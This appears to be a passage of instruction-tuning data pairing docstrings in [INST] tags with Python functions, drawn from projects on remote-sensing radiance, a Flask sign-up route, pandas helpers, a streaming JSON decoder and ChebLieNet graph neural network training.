args[1:] + mysixs.run() + xdict = { + 'xa': mysixs.outputs.coef_xa, + 'xb': mysixs.outputs.coef_xb, + 'xc': mysixs.outputs.coef_xc} + adjcorr_params = [ + mysixs.geometry.view_z, + mysixs.outputs.optical_depth_total.total, + mysixs.outputs.transmittance_global_gas.upward, + mysixs.outputs.transmittance_total_scattering.upward] + return (xdict, adjcorr_params, moreargs) +[INST] Compute TOA radiance from DigitalGlobe digital numbers +Parameters + +dndata : ndarray shape (nbands, ny, nx) +digital numbers data +mtdFile : str +path to IMD metadata file +band_ids : sequence of int +band IDs. [/INST] def dn_to_radiance(dndata, mtdFile, band_ids): + radata = radiance.dn_to_radiance(dndata, mtdFile, band_ids=band_ids) + with np.errstate(invalid='ignore'): + radata[radata < 0] = 0 + return radata +[INST] Creates a new user and logs them in. [/INST] def sign_up(): + form = SignUpForm() + form['csrf_token'].data = request.cookies['csrf_token'] + err = '' + data = request.get_json() + if data['password'] != data['confirm_password']: + err='Password and confirm password must match.' + if form.validate_on_submit(): + if err == '': + user = User( + username=form.data['username'], + email=form.data['email'], + firstName=form.data['firstName'], + lastName=form.data['lastName'], + password=form.data['password'], + profileImg=form.data['profileImg'] + ) + db.session.add(user) + db.session.commit() + login_user(user) + return user.to_dict() + errors = validation_errors_to_error_messages(form.errors) + error_msgs = [txt.split(': ')[1] + for txt in validation_errors_to_error_messages(form.errors)] + if err: + error_msgs.append(err) + return {'errors': error_msgs}, 401 +[INST] Return length of string (number of word, seperated by Space).. [/INST] def string_len_w(string): + string_str = str(string) + string_list = string_str.split() + string_len = len(string_list) + return string_len +[INST] Making a list based on entry in one category and if missing adds entry of another Column. [/INST] def helper_list(): + empty = [] + for i in range(df.shape[0]): + if df["category_parent_id"][i] != 0: + empty.append(df["category_parent_id"][i]) + else: + empty.append(df["category_id"][i]) + return empty +[INST] based on key value in a column, column with value is added as a column and updated dataframe is returned.. [/INST] def add_parent_name(df, column_name1, column_name2, dictionary): + df[column_name1] = df[column_name2].apply(lambda x: dictionary.get(x)) + return df +[INST] Calculating difference between two timepoints and returns it in days. [/INST] def duration(deadline, launched_at): + duration = deadline - launched_at + duration_complete = dt.timedelta(seconds=duration) + return duration_complete.days +[INST] Converts a Column based on given exchange rate, rounds it to two decimal spaces +and returns updated dataframe, e.g.. [/INST] def usd_convert_goal(df, column_name, exchange_rate): + df[column_name] = (df[column_name] * df[exchange_rate]).round(2) + return df +[INST] Creating dataframe and dropping all duplicates, based on a column_name +and keep the last ("newest") duplicate. [/INST] def drop_duplicates(df, column_name): + df = df.drop_duplicates(subset=['id'], keep='last') + return df +[INST] Only create new csv if not already done. [/INST] def read_files(): + if not Path("./data/Kickstarter_merged.csv").exists(): + all_files = glob.glob(os.path.join(path, "Kickstarter*.csv")) + df_from_each_file = (pd.read_csv(f, sep=',') for f in all_files) + df_merged = pd.concat(df_from_each_file, ignore_index=True) + df_merged.to_csv('./data/Kickstarter_merged.csv') + return pd.read_csv('./data/Kickstarter_merged.csv', index_col=0) +[INST] Almost identical to ``json.load``, except that it produces and iterator. +Which returns zero or more objects that can be decoded by JSON documents +separated by whitespace, or the given string or regex. + +``separator`` defaults to zero or more whitespace characters. You can +provide a different, but fixed width, separator if desired. + + + + + +``max_bufsize`` limit the size of the buffer used to hold unparsed +parts of the document. Must be at least as large as the largest document +in the stream, or a JSONDecodeError will be raised.. [/INST] def load( + fp, *, cls=None, object_hook=None, parse_float=None, + parse_int=None, parse_constant=None, object_pairs_hook=None, + separator=None, + bufsize=1048576, + max_bufsize=float('inf'), + stream_offset=0, + **kw +): + if not hasattr(fp, 'encoding'): + fp = io.TextIOWrapper(fp, encoding='utf8') + cls, kw = _parse_kw( + cls, object_hook, parse_float, parse_int, parse_constant, object_pairs_hook, kw + ) + next_pos, pos = get_first_pos_and_next_pos_func(separator) + return iter(DecodeStream( + fp, + cls(**kw), + next_pos, + pos, + kw.get('parse_int'), + kw.get('parse_float'), + bufsize, + max_bufsize, + stream_offset, + )) +[INST] Almost identical to ``json.loads``, except that it produces and iterator. +Which returns zero or more objects that are decoded from JSON documents +separated by whitespace, or the given string or regex. + +Always decodes bytes and bytearrays as UTF-8. Manually decode if this is +not desired. + + + +``separator`` defaults to zero or more whitespace characters. You can +provide a different, but fixed width, separator if desired.. [/INST] def loads( + s, *, cls=None, object_hook=None, parse_float=None, + parse_int=None, parse_constant=None, object_pairs_hook=None, + pos=0, + separator=None, + **kw +): + if isinstance(s, str): + if s.startswith('\ufeff'): + raise JSONDecodeError("Unexpected UTF-8 BOM (decode using utf-8-sig)", + s, 0) + else: + if not isinstance(s, (bytes, bytearray)): + raise TypeError(f'the JSON object must be str, bytes or bytearray, ' + f'not {s.__class__.__name__}') + s = s.decode('utf8') + cls, kw = _parse_kw( + cls, object_hook, parse_float, parse_int, parse_constant, object_pairs_hook, kw + ) + next_pos, pos = get_first_pos_and_next_pos_func(separator) + return decode_stacked(s, cls(**kw), next_pos, pos) +[INST] Read enough data from the stream until: +the start of the next object is found (return true) +the delimiter check fails (raise an error) +the stream is empty (return false). [/INST] def next_pos(self): + while True: + new_pos = self.next_pos_helper(self.partial_doc, self.pos) + if new_pos is None: + if self._try_read(''): + continue + return False + else: + self.pos = new_pos + return True +[INST] Reads new data, and adds to any unparsed data. +Returns true if new data was read. [/INST] def _try_read(self, remaining_buffer): + if len(remaining_buffer) + self.bufsize > self.max_bufsize: + to_read = self.max_bufsize - len(remaining_buffer) + if to_read <= 0: + raise ValueError('max buffer size exceeded') + else: + to_read = self.bufsize + new = self.stream.read(to_read) + self.stream_offset += len(self.partial_doc) - len(remaining_buffer) + self.partial_doc = remaining_buffer + new + self.pos = 0 + return bool(new) +[INST] Trains a model on MNIST and evaluates its performance on MNIST, Flip-MNIST and 90Rot-MNIST.. [/INST] def train(config=None): + with wandb.init(config=config, project="cheblienet"): + config = wandb.config + wandb.log({"dataset": "cifar10"}) + wandb.log(vars(args)) + device = torch.device("cuda" if torch.cuda.is_available() and args.cuda else "cpu") + if args.pool: + if args.anisotropic: + graph_lvl0 = SE2GEGraph( + [8, 8, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi_0), + path_to_graph=args.path_to_graph, + ) + graph_lvl1 = SE2GEGraph( + [16, 16, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi_1), + path_to_graph=args.path_to_graph, + ) + else: + graph_lvl0 = R2GEGraph( + [8, 8, 1], + K=config.K, + sigmas=(1.0, config.eps, config.xi_0), + path_to_graph=args.path_to_graph, + ) + graph_lvl1 = R2GEGraph( + [16, 16, 1], + K=config.K, + sigmas=(1.0, config.eps, config.xi_1), + path_to_graph=args.path_to_graph, + ) + if args.anisotropic: + graph_lvl2 = SE2GEGraph( + [32, 32, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi_2), + path_to_graph=args.path_to_graph, + ) + else: + graph_lvl2 = R2GEGraph( + [32, 32, 1], + K=config.K, + sigmas=(1.0, config.eps, config.xi_2), + path_to_graph=args.path_to_graph, + ) + model = WideResSE2GEChebNet( + in_channels=3, + out_channels=10, + kernel_size=config.kernel_size, + graph_lvl0=graph_lvl0 if args.pool else graph_lvl2, + graph_lvl1=graph_lvl1 if args.pool else None, + graph_lvl2=graph_lvl2 if args.pool else None, + res_depth=args.res_depth, + widen_factor=args.widen_factor, + reduction=args.reduction if args.pool else None, + ).to(device) + wandb.log({"capacity": capacity(model)}) + optimizer = Adam(model.parameters(), lr=args.lr) + train_loader, _ = get_train_val_loaders( + "cifar10", + num_layers=config.ntheta, + batch_size=args.batch_size, + val_ratio=0.0, + path_to_data=args.path_to_data, + ) + (classic_test_loader, rotated_test_loader, flipped_test_loader,) = get_equiv_test_loaders( + "cifar10", num_layers=config.ntheta, batch_size=args.batch_size, path_to_data=args.path_to_data + ) + trainer = create_supervised_trainer( + graph=graph_lvl2, + model=model, + optimizer=optimizer, + loss_fn=nll_loss, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Training").attach(trainer) + classic_metrics = {"classic_test_accuracy": Accuracy(), "classic_test_loss": Loss(nll_loss)} + rotated_metrics = {"rotated_test_accuracy": Accuracy(), "rotated_test_loss": Loss(nll_loss)} + flipped_metrics = {"flipped_test_accuracy": Accuracy(), "flipped_test_loss": Loss(nll_loss)} + classic_evaluator = create_supervised_evaluator( + graph=graph_lvl2, + model=model, + metrics=classic_metrics, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Evaluation").attach(classic_evaluator) + rotated_evaluator = create_supervised_evaluator( + graph=graph_lvl2, + model=model, + metrics=rotated_metrics, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Evaluation").attach(rotated_evaluator) + flipped_evaluator = create_supervised_evaluator( + graph=graph_lvl2, + model=model, + metrics=flipped_metrics, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Evaluation").attach(flipped_evaluator) + trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, classic_evaluator, classic_test_loader) + trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, rotated_evaluator, rotated_test_loader) + trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, flipped_evaluator, flipped_test_loader) + trainer.run(train_loader, max_epochs=args.max_epochs) +[INST] Extra representation of the Chebyschev convolutional layer.. [/INST] def extra_repr(self): + s = "in_channels={in_channels}, out_channels={out_channels}, kernel_size={kernel_size}" + if self.bias is None: + s += ", bias=False" + else: + s += ", bias=True" + return s.format(**self.__dict__) +[INST] Returns a new tensor corresponding to matrix formulation of the given input tensors representing +SO(3) group elements.. [/INST] def so3_matrix(alpha, beta, gamma, device=None): + R_alpha_z = rotation_matrix(alpha, "z", device) + R_beta_y = rotation_matrix(beta, "y", device) + R_gamma_z = rotation_matrix(gamma, "z", device) + return R_gamma_z @ R_beta_y @ R_alpha_z +[INST] Returns a new tensor corresponding to the inverse of the group elements in matrix formulation.. [/INST] def s2_inverse(G): + return torch.transpose(G, -1, -2) +[INST] Returns a new tensor corresponding to the inverse of the group elements in matrix formulation.. [/INST] def so3_inverse(G): + return torch.transpose(G, -1, -2) +[INST] Return new tensors corresponding to alpha, beta and gamma attributes of the group elements specified by the +S2 group elements in matrix formulation.. [/INST] def s2_element(G): + gamma = torch.atan2(G[..., 1, 0], G[..., 0, 0]) + beta = torch.acos(G[..., 2, 2]) + return beta, gamma +[INST] Return new tensors corresponding to alpha, beta and gamma attributes of the group elements specified by the +so3 group elements in matrix formulation.. [/INST] def so3_element(G): + gamma = torch.atan2(G[..., 1, 2], G[..., 0, 2]) + sin = torch.sin(gamma) + cos = torch.cos(gamma) + beta = torch.atan2(cos * G[..., 0, 2] + sin * G[..., 1, 2], G[..., 2, 2]) + alpha = torch.atan2(-sin * G[..., 0, 0] + cos * G[..., 1, 0], -sin * G[..., 0, 1] + cos * G[..., 1, 1]) + return alpha, beta, gamma +[INST] Returns a new tensor containing the riemannnian logarithm of the group elements in matrix formulation.. [/INST] def s2_log(G): + beta, gamma = s2_element(G) + G = so3_matrix(-gamma, beta, gamma) + theta = torch.acos(((G[..., 0, 0] + G[..., 1, 1] + G[..., 2, 2]) - 1) / 2) + c1 = 0.5 * theta / torch.sin(theta) * (G[..., 2, 1] - G[..., 1, 2]) + c2 = 0.5 * theta / torch.sin(theta) * (G[..., 0, 2] - G[..., 2, 0]) + c3 = torch.zeros_like(c1) + mask = theta == 0.0 + c1[mask] = 0.5 * G[mask, 2, 1] - G[mask, 1, 2] + c2[mask] = 0.5 * G[mask, 0, 2] - G[mask, 2, 0] + mask = theta == math.pi + c1[mask] = math.pi + c2[mask] = 0.0 + c = torch.stack((c1, c2, c3), dim=-1).unsqueeze(2) + return c +[INST] Returns a new tensor containing the riemannnian logarithm of the group elements in matrix formulation.. [/INST] def so3_log(G): + theta = torch.acos(((G[..., 0, 0] + G[..., 1, 1] + G[..., 2, 2]) - 1) / 2) + c1 = 0.5 * theta / torch.sin(theta) * (G[..., 2, 1] - G[..., 1, 2]) + c2 = 0.5 * theta / torch.sin(theta) * (G[..., 0, 2] - G[..., 2, 0]) + c3 = 0.5 * theta / torch.sin(theta) * (G[..., 1, 0] - G[..., 0, 1]) + mask = theta == 0.0 + c1[mask] = 0.5 * G[mask, 2, 1] - G[mask, 1, 2] + c2[mask] = 0.5 * G[mask, 0, 2] - G[mask, 2, 0] + c3[mask] = 0.5 * G[mask, 1, 0] - G[mask, 0, 1] + mask = theta == math.pi + c1[mask] = math.pi + c2[mask] = 0.0 + c3[mask] = 0.0 + c = torch.stack((c1, c2, c3), dim=-1).unsqueeze(2) + return c +[INST] Return the squared riemannian distances between group elements in matrix formulation.. [/INST] def s2_riemannian_sqdist(Gg, Gh, Re): + G = torch.matmul(s2_inverse(Gg), Gh) + return weighted_norm(s2_log(G), Re) +[INST] Returns the squared riemannian distances between group elements in matrix formulation.. [/INST] def so3_riemannian_sqdist(Gg, Gh, Re): + G = torch.matmul(so3_inverse(Gg), Gh) + alpha, beta, gamma = so3_element(G) + sqdist1 = weighted_norm(so3_log(so3_matrix(alpha, beta, gamma)), Re) + sqdist2 = weighted_norm(so3_log(so3_matrix(alpha - math.pi, beta, gamma)), Re) + sqdist3 = weighted_norm(so3_log(so3_matrix(alpha + math.pi, beta, gamma)), Re) + sqdist, _ = torch.stack((sqdist1, sqdist2, sqdist3)).min(dim=0) + return sqdist +[INST] Make the graph undirected, that is create an inverse edge for each edge.. [/INST] def to_undirected(edge_index, edge_sqdist, edge_weight=None, num_vertices=None, max_sqdist=None, self_loop=False): + num_vertices = num_vertices or edge_index.max() + 1 + sqdist_matrix = torch.sparse.FloatTensor(edge_index, edge_sqdist, torch.Size((num_vertices, num_vertices))).to_dense() + mask = sqdist_matrix.t() == sqdist_matrix + if max_sqdist is not None: + mask &= sqdist_matrix <= max_sqdist + undirected_sqdist_matrix = torch.zeros_like(sqdist_matrix) + undirected_sqdist_matrix[mask] = sqdist_matrix[mask] + undirected_sqdist_matrix = undirected_sqdist_matrix.to_sparse() + if edge_weight is not None: + weight_matrix = torch.sparse.FloatTensor(edge_index, edge_weight, torch.Size((num_vertices, num_vertices))).to_dense() + undirected_weight_matrix = torch.zeros_like(weight_matrix) + undirected_weight_matrix[mask] = weight_matrix[mask] + undirected_weight_matrix = undirected_weight_matrix.to_sparse() + edge_index = undirected_sqdist_matrix.indices() + edge_sqdist = undirected_sqdist_matrix.values() + if edge_weight is not None: + edge_weight = undirected_weight_matrix.values() + if self_loop: + if edge_weight is None: + return edge_index, edge_sqdist + return edge_index, edge_sqdist, edge_weight + return remove_self_loops(edge_index, edge_sqdist, edge_weight) +[INST] Removes all self-loop in the graph.. [/INST] def remove_self_loops(edge_index, edge_sqdist, edge_weight=None): + mask = edge_index[0] != edge_index[1] + if edge_weight is None: + return edge_index[..., mask], edge_sqdist[mask] + return edge_index[..., mask], edge_sqdist[mask], edge_weight[mask] +[INST] Add a self-loop for each vertex of the graph.. [/INST] def add_self_loops(edge_index, edge_attr, weight=1.0): + self_loop_index = edge_index[0].unique().unsqueeze(0).repeat(2, 1) + self_loop_attr = weight * torch.ones(self_loop_index.shape[1]) + edge_index = torch.cat((self_loop_index, edge_index), dim=1) + edge_attr = torch.cat((self_loop_attr, edge_attr)) + return edge_index, edge_attr +[INST] U-net-like model training on ClimateNet for the segmentation of extreme meteorogolical events.. [/INST] def train(config=None): + with wandb.init(config=config, project="cheblienet"): + config = wandb.config + wandb.log({"dataset": "artc"}) + wandb.log(vars(args)) + device = torch.device("cuda" if torch.cuda.is_available() and args.cuda else "cpu") + if args.anisotropic: + graph_lvl0 = SO3GEGraph( + size=[12, config.nalpha], + sigmas=(1.0, config.eps, config.xi_0), + K=config.K, + path_to_graph=args.path_to_graph, + ) + graph_lvl1 = SO3GEGraph( + size=[42, config.nalpha], + sigmas=(1.0, config.eps, config.xi_1), + K=config.K, + path_to_graph=args.path_to_graph, + ) + graph_lvl2 = SO3GEGraph( + size=[162, config.nalpha], + sigmas=(1.0, config.eps, config.xi_2), + K=config.K, + path_to_graph=args.path_to_graph, + ) + graph_lvl3 = SO3GEGraph( + size=[642, config.nalpha], + sigmas=(1.0, config.eps, config.xi_3), + K=config.K, + path_to_graph=args.path_to_graph, + ) + graph_lvl4 = SO3GEGraph( + size=[2562, config.nalpha], + sigmas=(1.0, config.eps, config.xi_4), + K=config.K, + path_to_graph=args.path_to_graph, + ) + graph_lvl5 = SO3GEGraph( + size=[10242, config.nalpha], + sigmas=(1.0, config.eps, config.xi_5), + K=config.K, + path_to_graph=args.path_to_graph, + ) + else: + graph_lvl0 = S2GEGraph( + size=[12, config.nalpha], + sigmas=(1.0, config.eps, config.xi_0), + K=config.K, + path_to_graph=args.path_to_graph, + ) + graph_lvl1 = S2GEGraph( + size=[42, config.nalpha], + sigmas=(1.0, config.eps, config.xi_1), + K=config.K, + path_to_graph=args.path_to_graph, + ) + graph_lvl2 = S2GEGraph( + size=[162, config.nalpha], + sigmas=(1.0, config.eps, config.xi_2), + K=config.K, + path_to_graph=args.path_to_graph, + ) + graph_lvl3 = S2GEGraph( + size=[642, config.nalpha], + sigmas=(1.0, config.eps, config.xi_3), + K=config.K, + path_to_graph=args.path_to_graph, + ) + graph_lvl4 = S2GEGraph( + size=[2562, config.nalpha], + sigmas=(1.0, config.eps, config.xi_4), + K=config.K, + path_to_graph=args.path_to_graph, + ) + graph_lvl5 = S2GEGraph( + size=[10242, config.nalpha], + sigmas=(1.0, config.eps, config.xi_5), + K=config.K, + path_to_graph=args.path_to_graph, + ) + output_graph = S2GEGraph( + size=[10242, 1], + sigmas=(1.0, 1.0, 1.0), + K=config.K, + path_to_graph=args.path_to_graph, + ) + model = SO3GEUChebNet( + 16, + 3, + config.kernel_size, + graph_lvl0, + graph_lvl1, + graph_lvl2, + graph_lvl3, + graph_lvl4, + graph_lvl5, + output_graph, + args.reduction, + args.expansion, + ).to(device) + wandb.log({"capacity": capacity(model)}) + optimizer = Adam(model.parameters(), lr=args.lr) + train_loader, _ = get_train_val_loaders( + "artc", + batch_size=args.batch_size, + num_layers=config.nalpha, + val_ratio=0.0, + path_to_data=args.path_to_data, + ) + test_loader = get_test_loader( + "artc", batch_size=args.batch_size, num_layers=config.nalpha, path_to_data=args.path_to_data + ) + trainer = create_supervised_trainer( + graph=graph_lvl5, + model=model, + optimizer=optimizer, + loss_fn=nll_loss, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Training").attach(trainer) + cm = ConfusionMatrix(num_classes=3) + miou = mIoU(cm) + miou_wo_bg = mIoU(cm, ignore_index=0) + f1 = Fbeta(1, precision=Precision(average=False), recall=Recall(average=False)) + acc_bg = PerClassAccuracy(0) + acc_ar = PerClassAccuracy(1) + acc_tc = PerClassAccuracy(2) + mean_average_precision = AveragePrecision(output_transform=output_transform_mAP) + loss = Loss(nll_loss) + metrics = { + "test_F1": f1, + "test_mIoU": miou, + "test_mIoU_bg": miou_wo_bg, + "test_loss": loss, + "test_acc_bg": acc_bg, + "test_acc_ar": acc_ar, + "test_acc_tc": acc_tc, + "test_mAP": mean_average_precision, + } + evaluator = create_supervised_evaluator( + graph=graph_lvl5, + model=model, + metrics=metrics, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Evaluation").attach(evaluator) + _ = trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, evaluator, test_loader) + trainer.run(train_loader, max_epochs=args.max_epochs) +[INST] Gets training configuration for bayesian hyper-parameters optimization.. [/INST] def build_sweep_config() -> dict: + sweep_config = { + "method": "bayes", + "metric": {"name": "validation_accuracy", "goal": "maximize"}, + } + parameters = { + "batch_size": {"distribution": "categorical", "values": [8, 16, 32]}, + "kernel_size": {"distribution": "categorical", "values": [2, 3, 4, 5, 6]}, + "K": {"distribution": "categorical", "values": [8, 16, 32]}, + "xi": {"distribution": "log_uniform", "min": math.log(1e-4), "max": math.log(1e-1)}, + "ntheta": {"distribution": "int_uniform", "min": 2, "max": 9}, + "eps": {"distribution": "log_uniform", "min": math.log(1e-2), "max": math.log(1)}, + } + sweep_config["parameters"] = parameters + return sweep_config +[INST] Bayesian hyper-parameters optimization on CIFAR10.. [/INST] def train(config=None): + with wandb.init(config=config): + config = wandb.config + wandb.log({"dataset": "cifar10"}) + wandb.log(vars(args)) + device = torch.device("cuda" if torch.cuda.is_available() and args.cuda else "cpu") + graph_lvl0 = SE2GEGraph( + [8, 8, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi * 16), + path_to_graph=args.path_to_graph, + ) + graph_lvl1 = SE2GEGraph( + [16, 16, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi * 4), + path_to_graph=args.path_to_graph, + ) + graph_lvl2 = SE2GEGraph( + [32, 32, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi), + path_to_graph=args.path_to_graph, + ) + model = WideResSE2GEChebNet( + in_channels=3, + out_channels=10, + kernel_size=config.kernel_size, + graph_lvl0=graph_lvl0, + graph_lvl1=graph_lvl1, + graph_lvl2=graph_lvl2, + res_depth=args.res_depth, + widen_factor=args.widen_factor, + reduction=args.reduction if args.pool else None, + ).to(device) + wandb.log({"capacity": capacity(model)}) + optimizer = Adam(model.parameters(), lr=args.lr) + train_loader, val_loader = get_train_val_loaders( + "cifar10", + batch_size=config.batch_size, + val_ratio=0.3, + path_to_data=args.path_to_data, + ) + trainer = create_supervised_trainer( + graph=graph_lvl2, + model=model, + optimizer=optimizer, + loss_fn=nll_loss, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Training").attach(trainer) + metrics = {"validation_accuracy": Accuracy(), "validation_loss": Loss(nll_loss)} + evaluator = create_supervised_evaluator( + graph=graph_lvl2, + model=model, + metrics=metrics, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Evaluation").attach(evaluator) + trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, evaluator, val_loader) + trainer.run(train_loader, max_epochs=args.max_epochs) +[INST] Trains a model on STL10 and evaluates its performance on STL10, Flip-STL10 and 90Rot-STL10.. [/INST] def train(config=None): + with wandb.init(config=config, project="cheblienet"): + config = wandb.config + wandb.log({"dataset": "stl10"}) + wandb.log(vars(args)) + device = torch.device("cuda" if torch.cuda.is_available() and args.cuda else "cpu") + if args.anisotropic: + graph_lvl0 = SE2GEGraph( + [24, 24, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi_0), + path_to_graph=args.path_to_graph, + ) + graph_lvl1 = SE2GEGraph( + [48, 48, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi_1), + path_to_graph=args.path_to_graph, + ) + graph_lvl2 = SE2GEGraph( + [96, 96, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi_2), + path_to_graph=args.path_to_graph, + ) + else: + graph_lvl0 = R2GEGraph( + [24, 24, 1], + K=config.K, + sigmas=(1.0, config.eps, config.xi_0), + path_to_graph=args.path_to_graph, + ) + graph_lvl1 = R2GEGraph( + [48, 48, 1], + K=config.K, + sigmas=(1.0, config.eps, config.xi_1), + path_to_graph=args.path_to_graph, + ) + graph_lvl2 = R2GEGraph( + [96, 96, 1], + K=config.K, + sigmas=(1.0, config.eps, config.xi_2), + path_to_graph=args.path_to_graph, + ) + model = WideResSE2GEChebNet( + in_channels=3, + out_channels=10, + kernel_size=config.kernel_size, + graph_lvl0=graph_lvl0, + graph_lvl1=graph_lvl1, + graph_lvl2=graph_lvl2, + res_depth=args.res_depth, + widen_factor=args.widen_factor, + reduction=args.reduction, + ).to(device) + wandb.log({"capacity": capacity(model)}) + optimizer = Adam(model.parameters(), lr=args.lr) + train_loader, _ = get_train_val_loaders( + "stl10", + batch_size=args.batch_size, + val_ratio=0.0, + num_layers=config.ntheta, + path_to_data=args.path_to_data, + ) + test_loader = get_test_loader( + "stl10", batch_size=args.batch_size, num_layers=config.ntheta, path_to_data=args.path_to_data + ) + trainer = create_supervised_trainer( + graph=graph_lvl2, + model=model, + optimizer=optimizer, + loss_fn=nll_loss, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Training").attach(trainer) + metrics = {"test_accuracy": Accuracy(), "test_loss": Loss(nll_loss)} + evaluator = create_supervised_evaluator( + graph=graph_lvl2, + model=model, + metrics=metrics, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Evaluation").attach(evaluator) + trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, evaluator, test_loader) + trainer.run(train_loader, max_epochs=args.max_epochs) +[INST] Factory function for creating a trainer for supervised models.. [/INST] def create_supervised_trainer( + graph, + model, + optimizer, + loss_fn, + device=None, + prepare_batch=None, + output_transform=None, +): + device = device or torch.device("cpu") + prepare_batch = prepare_batch if prepare_batch is not None else lambda x, y: (x, y) + output_transform = output_transform if output_transform is not None else lambda x, y, y_pred, loss: loss.item() + def _update(engine, batch): + model.train() + optimizer.zero_grad() + x, y = prepare_batch(batch, graph, device) + y_pred = model(x) + loss = loss_fn(y_pred, y) + loss.backward() + optimizer.step() + return output_transform(x, y, y_pred, loss) + trainer = Engine(_update) + return trainer +[INST] Factory function for creating an evaluator for supervised models.. [/INST] def create_supervised_evaluator(graph, model, metrics=None, device=None, prepare_batch=None, output_transform=None): + metrics = metrics or {} + device = device or torch.device("cpu") + prepare_batch = prepare_batch if prepare_batch is not None else lambda x, y: (x, y) + output_transform = output_transform if output_transform is not None else lambda x, y, y_pred: (y_pred, y) + def _inference(engine, batch): + model.eval() + with torch.no_grad(): + x, y = prepare_batch(batch, graph, device) + y_pred = model(x) + return output_transform(x, y, y_pred) + evaluator = Engine(_inference) + for name, metric in metrics.items(): + metric.attach(evaluator, name) + return evaluator +[INST] Download the dataset if it doesn't already exist.. [/INST] def download(self): + if not self.check_exists(): + download_and_extract_archive(self.resource, download_root=os.path.split(self.path_to_data)[0]) + else: + print("Data already exists") +[INST] Check if dataset already exists.. [/INST] def check_exists(self): + return os.path.exists(self.path_to_data) +[INST] Return a new tensor filled with rotation matrices.. [/INST] def rotation_matrix(angle, axis, device=None): + R = torch.zeros(angle.nelement(), 3, 3, device=device) + cos = torch.cos(angle) + sin = torch.sin(angle) + if axis == "x": + R[..., 0, 0] = 1.0 + R[..., 1, 1] = cos + R[..., 1, 2] = -sin + R[..., 2, 1] = sin + R[..., 2, 2] = cos + if axis == "y": + R[..., 0, 0] = cos + R[..., 0, 2] = sin + R[..., 2, 0] = -sin + R[..., 2, 2] = cos + R[..., 1, 1] = 1.0 + if axis == "z": + R[..., 0, 0] = cos + R[..., 0, 1] = -sin + R[..., 1, 0] = sin + R[..., 1, 1] = cos + R[..., 2, 2] = 1.0 + return R +[INST] Return new tensors corresponding to angle representation from the cartesian representation. +Warning: x, y, z have to be on the 1-sphere.. [/INST] def xyz2betagamma(x, y, z): + beta = torch.acos(z) + gamma = torch.atan2(y, x) + return beta, gamma +[INST] Returns new tensors corresponding to angle representation from the cartesian representation.. [/INST] def betagamma2xyz(beta, gamma, axis=None): + if axis == "x": + return torch.sin(beta) * torch.cos(gamma) + if axis == "y": + return torch.sin(beta) * torch.sin(gamma) + if axis == "z": + return torch.cos(beta) + x = torch.sin(beta) * torch.cos(gamma) + y = torch.sin(beta) * torch.sin(gamma) + z = torch.cos(beta) + return x, y, z +[INST] Check if input is a numpy object.. [/INST] def _is_numpy(input): + return isinstance(input, np.ndarray) +[INST] Convert a ``PIL Image`` to a tensor of the same type. +This function does not support torchscript.. [/INST] def pil_to_tensor(input): + if not _is_pil_image(input): + raise TypeError("input should be PIL Image. Got {}".format(type(input))) + default_float_dtype = torch.get_default_dtype() + if input.mode == "I": + output = torch.from_numpy(np.array(input, np.int32, copy=False)) + elif input.mode == "I;16": + output = torch.from_numpy(np.array(input, np.int16, copy=False)) + elif input.mode == "F": + output = torch.from_numpy(np.array(input, np.float32, copy=False)) + elif input.mode == "1": + output = 255 * torch.from_numpy(np.array(input, np.uint8, copy=False)) + else: + output = torch.ByteTensor(torch.ByteStorage.from_buffer(input.tobytes())) + output = output.view(input.size[1], input.size[0], len(input.getbands())) + output = output.permute((2, 0, 1)).contiguous() + if isinstance(output, torch.ByteTensor): + return output.to(dtype=default_float_dtype).div(255) + else: + return output +[INST] Return the diffusion kernel of the graph specified by the kernel input.. [/INST] def diff_kernel(self, kernel): + lambdas, Phi = self.get_eigen_space() + return Phi @ np.diag(kernel(lambdas)) @ Phi.T +[INST] Return the total number of vertices of the graph.. [/INST] def num_vertices(self): + return self.vertex_index.shape[0] +[INST] Return the total number of edges of the graph.. [/INST] def num_edges(self): + return self.edge_index.shape[1] +[INST] Returns the vertex's neighborhood.. [/INST] def neighborhood(self, vertex_index): + if not vertex_index in self.vertex_index: + raise ValueError(f"{vertex_index} is not a valid vertex index") + mask = self.edge_index[0] == vertex_index + return self.edge_index[1, mask], self.edge_weight[mask], self.edge_sqdist[mask] +[INST] Save graph's attributes.. [/INST] def save(self, path_to_graph): + os.makedirs(path_to_graph, exist_ok=True) + torch.save(self.vertex_index, os.path.join(path_to_graph, f"{self.hash_repr()}_vertex_index.pt")) + torch.save(self.edge_index, os.path.join(path_to_graph, f"{self.hash_repr()}_edge_index.pt")) + torch.save(self.edge_sqdist, os.path.join(path_to_graph, f"{self.hash_repr()}_edge_sqdist.pt")) + torch.save(self.edge_weight, os.path.join(path_to_graph, f"{self.hash_repr()}_edge_weight.pt")) + for vertex_attr in self.vertex_attributes: + torch.save(getattr(self, vertex_attr), os.path.join(path_to_graph, f"{self.hash_repr()}_{vertex_attr}.pt")) +[INST] Load graph's attributes.. [/INST] def load(self, path_to_graph): + self.vertex_index = 